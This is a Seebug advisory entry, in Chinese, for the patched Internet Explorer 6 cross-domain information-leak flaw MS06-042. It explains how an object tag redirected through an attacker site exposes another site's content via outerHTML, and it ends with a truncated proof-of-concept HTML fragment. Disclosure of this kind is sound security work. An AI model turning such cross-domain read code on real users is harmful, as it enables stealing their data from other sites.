Microsoft Internet Explorer OuterHTML重新定向信息泄漏漏洞(MS06-042)

2006-10-27T00:00:00
ID SSV:232
Type seebug
Reporter Root
Modified 2006-10-27T00:00:00

Description

Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft Internet Explorer中存在跨域漏洞。攻击者可以创建特制的对象标签,该标签的数据参数引用了攻击者站点的链接,而这个站点将Location HTTP首部指定为目标站点,这样就可以通过对象的outerHTML属性读取敏感信息。

Microsoft Internet Explorer 6.0 Microsoft已经为此发布了一个安全公告(MS06-042)以及相应补丁: MS06-042:Cumulative Security Update for Internet Explorer (918899) 链接:http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx

                                        
                                            
                                                ------------------------- i.html -------------------------
<html><body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/1234567